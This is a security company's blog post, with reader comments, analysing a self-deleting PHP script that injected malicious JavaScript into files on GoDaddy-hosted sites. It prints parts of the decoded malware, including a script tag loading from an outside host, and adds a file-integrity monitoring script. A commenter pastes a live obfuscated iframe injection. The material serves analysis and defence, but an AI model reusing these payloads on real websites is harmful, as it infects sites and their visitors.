Found code used to inject the malware at GoDaddy

Update: Reply from GoDaddy: http://blog.sucuri.net/2010/05/reply-from-godaddy-regarding-latest.html

While GoDaddy was busy blaming its users, one of our friends, Kevin Reville, got tired of getting hacked and set up a cron script to monitor his site and alert him when new files were added.

What did he find? He found the malware used by the attackers to infect everyone.

Just to be clear: this has nothing to do with WordPress. In fact, on one site we were monitoring, nothing related to WordPress got logged, except this script being called and then deleted. We also saw Joomla sites getting hacked, and many other web applications.

So what is going on? The attackers are able to create this single PHP file on all the sites and then remotely execute it to infect everything. Once it is done, the script deletes itself.

Analysis:

The script in this situation was called "simple_production.php" (but we heard reports of different names being used). It is a base64-encoded file that looks like this: (see it in full MW:SIPRO:1)

eval(base64_decode("DQpzZXRfdGltZV9saW1pdCgwKTsNCg0KDQpmdW5jdGlvbiBpbmplY3….

Decoded, this is what it does: (see the full content here)

1-First, it removes itself:

$z=$_SERVER["SCRIPT_FILENAME"];
@unlink($z);

2-Encodes the JavaScript to be injected:

$cod=base64_encode('< script src="http://holasionweb.com/oo.php">
$to_pack='if(function_exists(\'ob_start\')&&!isset($GLOBALS[\'mr_n..

3-Scans all directories and adds the malware to every PHP file. After that, it prints the number of infected files and exits:

$val=dirname($z);
$totalinjected=0;
echo "Working with $val\n";
$start_time=microtime(true);
if ($val!="")inject_in_folder($val);
$end_time=microtime(true)-$start_time;
echo "|Injected| $totalinjected files in $end_time seconds\n";
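The monitoring approach that caught this script (a cron job watching for new files) can be reproduced with a few lines of shell. The following is an added example, not Kevin Reville's script or any Sucuri tool: it keeps a SHA-256 manifest of a document root, reports files added, changed or removed since the last run, and flags PHP files whose first line carries the eval(base64_decode( payload described above. The DOCROOT and STATEDIR paths are placeholders.

```shell
#!/bin/sh
# Added example (not from the Sucuri post): cron-style integrity check for a
# web document root. Run it from cron, e.g. every 15 minutes, and mail or log
# its output; a non-zero exit means there is something to look at.
# Usage: sh webroot_check.sh DOCROOT STATEDIR   (exit 0 = nothing to report)

build_manifest() {
    # one "<sha256>  <path>" line per file, sorted by path for a stable diff
    find "$1" -type f -exec sha256sum {} + | sort -k 2
}

flag_injected_php() {
    # print "INJECTED <path>" for each .php file whose first line has the marker
    find "$1" -type f -name '*.php' -exec sh -c '
        for f; do
            if head -n 1 "$f" | grep -q "eval(base64_decode("; then
                printf "INJECTED %s\n" "$f"
            fi
        done' sh {} +
}

check_webroot() {
    docroot=$1
    state=$2
    mkdir -p "$state"
    build_manifest "$docroot" > "$state/manifest.new"
    changed=0
    if [ -f "$state/manifest.txt" ]; then
        # "<" lines are entries that vanished (removed or modified files),
        # ">" lines are entries that appeared (new or modified files)
        if ! diff "$state/manifest.txt" "$state/manifest.new" > "$state/changes.txt"; then
            echo "CHANGES since last run:"
            cat "$state/changes.txt"
            changed=1
        fi
    else
        echo "baseline created for $docroot"
    fi
    mv "$state/manifest.new" "$state/manifest.txt"
    # a still-injected file is always worth an alert, even on the first run
    flag_injected_php "$docroot" | grep . && changed=1
    return $changed
}

if [ "$#" -eq 2 ]; then
    check_webroot "$1" "$2"
fi
```

A dropped-in file that is executed and deleted between two runs will not appear in the manifest diff, so the interval should be short and the check should be combined with web server access logs.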

So a simple PHP script is doing all this mess. The issue now is how they are able to inject this file on all those sites at GoDaddy. Permissions on most of the sites we checked were correct. It is not a web application bug. What is left is an internal problem at GoDaddy.

If you are a GoDaddy customer that got hacked, send this link to them. Let's hope for a good response this time.

As always, if you are having difficulties getting your site cleaned up, send us an email at contact@sucuri.net or visit our site: http://sucuri.net. We can get your sites cleaned up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.

About David Dede

Sucuri Security bot (crazy work) - Malware research updates, sucuri news and more.

  • Ryan

    I just called GoDaddy (again) to verify that the problem has been solved. The polite tech guy said that the issue had been fixed on their end, but urged me to call immediately if I noticed the attack again.

    I've been very disappointed with their response since Saturday.

  • http://www.danielansari.com Daniel

    I'd like to know what they did to fix it. If they fixed it, then that means they discovered how the initial php file got injected, and we all want to know that, too!

  • http://www.danielansari.com Daniel

    It would be great if GoDaddy could look at their Apache log files and see if there's a pattern of the IP addresses requesting the PHP infection script. Perhaps the perpetrator of these crimes could be found. I'm sure they would be using methods to hide though, such as requesting the script from innocent client machines.

  • Anonymous

    In my case I had already captured and decoded the same file.

    File was named rheba_jacqueline.php and my WordPress was running the latest version, 2.9.2.

  • Anonymous

    I found the same thing, called him_vivie.php; it was injected then deleted the night before the attack.

  • Anonymous

    Can you post a step by step to create a cron job on GoDaddy to do the fix? I think this might help in the interim that GoDaddy can't do anything about it.

  • Anonymous

    I have found a similar kind of file request. I searched for the file but couldn't find it, though it was mentioned in my log.

  • http://www.blogger.com/profile/07967171952551962859 Dan Thornton

    I've had one WordPress blog infected, so made sure the problem was solved asap, and then made sure all sites were updated to the latest software, and all passwords were changed in advance of deleting and reinstalling all files this weekend.

    And today I've found my main blog has been hit. Really not happy – not with the fact these things can happen, but that there hasn't been more effort to find a viable prevention as yet…

  • Anonymous

    For the third time… Thank You! You guys have saved my butt. It is unbelievable to me that the company that I am actually paying isn't looking out for its own customers as much as Sucuri is.

  • Anonymous

    Thank you THANK YOU! At least SOMEBODY is doing something real here!! This is the BEST site out there on all of this!

    What the freaking F is wrong with GoDaddy??

    Just last night I got this once again from them via email: "We continue to investigate the root cause of this issue."

    The title of THEIR email was: "Hosting – WordPress Compromise". Yeah, right. It's NOT just WordPress. And YES, I have 2.9.2.

    It's been a MONTH with three attacks in my account and they are still trying to determine what happened on THEIR servers?

    The fact that an attacker could just drop in a new file anytime on their servers, run it, and then delete it tells me all I need to know…

    unFREAKINGbelievable. Heads have got to roll there and they have GOT to tell the whole truth about what's been happening and whether/how they fixed it – or I don't think anybody will EVER trust them again. They have handled this stupendously poorly IMO and these are our businesses here.

  • Anonymous

    Maybe Godaddy needs to invest in security technology instead of Parties, Indy Cars and Super Bowl Ads for a while.

  • Anonymous

    Thanks for the update on the situation. I run a NON-wordpress site and this exact injection has happened 3 times in the past month.

    I called GoDaddy and they insisted it was a problem in my code. Although I knew they were wrong, there was really nothing I could do.

    So since then I've been removing the injections in every php file (30+) each time it happens. I just found this automated tool to do it though, so hopefully others will find this useful…

    —————————-

    http://theandystratton.com/downloads/godaddy_hack_fix.php.txt

    courtesy of andy stratton…

    here is the info on how to use it:

    Fixing the GoDaddy Hosting base64 Malware Hack

    I have created a very simple script to allow you to sniff for these files recursively and remove the first line of any files whose first line contains the string: <?php /**/ eval(base64_decode(

    This should clear things up, but I offer no guarantee or warranty and am not liable for what this file does. It’s simply a fix I used on a few client sites.

    Download the Fix —> http://theandystratton.com/downloads/godaddy_hack_fix.php.txt

    Instructions:

    1. Download the GoDaddy Hosting Malware Hack fix —> http://theandystratton.com/downloads/godaddy_hack_fix.php.txt
    2. Rename the file godaddy_hack_fix.php and upload to your document root.
    3. Visit the file in a browser, e.g. http://yourdomain.com/godaddy_hack_fix.php
    4. Review the location and number of files that are assumed infected and back them up (download them to your local machine in case of catastrophe)
    5. At the bottom of the script’s output, there’s a "Fix Files" button. If you’re ready, press it and wait. It will tell you when it’s removed the malicious first line from the files.
    6. I’d follow up by personally checking a few random files to ensure you seem right.

    This is a quick fix, but not complete. You should ideally remove and update from a back up, but let’s face it, most of us actually back things up. It’s human nature.

    Much love. Let me know if this helped you out.

  • Anonymous
  • http://bourgy.com Bourgy

    I think we should all link sucuri on a site of ours

  • Anonymous

    I would also suggest voicing your concerns regarding GoDaddy's responsiveness and accusations, or lack thereof, at their community forums:

    http://community.godaddy.com/groups/web-hosting/forum/

  • http://bourgy.com Bourgy

    BTW, I linked GoDaddy support to this page and they sent me a reply asking for my PIN number.

    Uhh, right?

    I like GoDaddy, but they should have realized this issue would drain the patience of most people.

  • Anonymous

    A thread was started on the Go Daddy Community Forums with the same topic title as this blog post. It was responded to by ScottG, a Go Daddy employee, with the same Go Daddy vagueness then it was deleted. There were several posts on the thread before it was deleted.

  • http://www.blogger.com/profile/11278614492905242431 Caitlin

    Don't bother posting on GoDaddy's forum. They really don't care. I was reading through some of the posts relating to the malware attack and it's the same tired "it's your fault, you're just stupid" posts by GoDaddy staff blaming their users.

  • http://www.blogger.com/profile/07788723951652931263 Kathy

    The fix, I believe, is to write a script in PERL and use regular expressions to remove the malicious code. That requires SHELL access and permission to run scripts. I have a guy working on it. Let me know if you want to employ his help.

  • Anonymous

    David/Kevin,

    Thank you very much. Does anyone know if the WP database is altered or injected by these GoDaddy attacks? I've checked mine thoroughly and found nothing so far.

    My guess is, if this is a general hack for all PHP sites then it doesn't care and is not affecting specific CMS databases.

  • http://www.danielansari.com Daniel

    It appears to be a general PHP hack – it hasn't affected my Joomla database.

    @Kathy, if you go to my site I have a PHP script that does the cleanup without leaving a blank line at the top of your files; you don't need shell access to run it.

  • Anonymous

    [What is left is an internal problem at GoDaddy.]
    –and every other linux/cpanel/php hosting provider.

    The real problem is uninformed users who cannot resist installing "cool plugin of the week". How many of these plugin/extension writers are directly involved in spam/botnet activity?

    Here is an example of where the real problem is:
    http://docs.joomla.org/Vulnerable_Extensions_List

  • Anonymous

    @Anonymous 7:05 PM

    …as uniformed as that statement? LMAO.

  • Anonymous

    Found the same file (different name – "according_fritz.php") on my godaddy server when looking through the History tab yesterday.

    I tried to decode the base 64 file to no avail — glad someone got it to be legible.

  • Anonymous

    For those blaming WP plugins, etc. (including Godaddy support) This has NOTHING to do with WordPress or any other CMS code! Our simple coded from scratch site with PHP extensions has been hacked twice same as all the rest. Godaddy is aware of this, but they continue to try to deflect the blame onto others. They even lie. They deleted a file from my site that had "good" base 64 encoded code, then claimed they didn't do it.
    I think the GoDaddy girls do more for them than just look sexy. I think that they are responsible for Godaddy security and customer service also!

  • Anonymous

    This is the third time my site has been hacked within 20 days. GoDaddy is not doing anything, or they don't have the right person to control the situation. This way our websites' future is in danger. Hope some way comes out with a solution.

  • Anonymous

    As a web developer, the majority of my 56 sites online have been hacked the last couple of weeks…. but, they are spread across 11 different hosting companies, and are on both Linux and Windows servers. My only WordPress site was hacked on May 12th, but all my BlogEngine.net sites (asp.net) have also been hacked. This is not just a PHP problem or a GoDaddy problem.

  • Anonymous

    Guys, this is the code which I found on my webpage online running… offline it is deleted by antivirus

    ""

  • Anonymous

    It's a PHP code like this eval(base64_decode……………………..:/>
    which is a virus script.
    I found it on the webpage, online.

  • Anonymous

    Hello Guys,

    I am also a victim. My suggestion is that if you are using any plugins like JavaScript and CSS optimizer then remove it. It's an RFI attack. Hope you all be happy with this. The attacker first distributes a free program (open source) which works fine but he puts a security hole in it for later use. He wins the faith from us and then attacks.

  • http://www.blogger.com/profile/05491250085131877193 morallydecrepit

    I asked GoDaddy for some logs so I could look at them myself and they said they couldn't do that. Right now I've just been checking my site every couple of days. But I still haven't figured out how they get in. I just delete all the hacked code from my php files.

  • Pingback: Tweets that mention Found code used to inject the malware at GoDaddy | Sucuri -- Topsy.com

  • http://twitter.com/XpertDevelopers @XpertDevelopers

    Hi,
    My files get infected with the below code..
    It's JavaScript code. The fix at this URL is not working for me.. http://sucuri.net/malware/helpers/wordpress-fix_p
    The injected code looks like below:
    <script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%71%61%77%66%65%72%2E%63%6F%6D%2F%3F%36%30%34%35%37%38%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn -->

  • Pingback: GoDaddy On The Run From PHP Attackers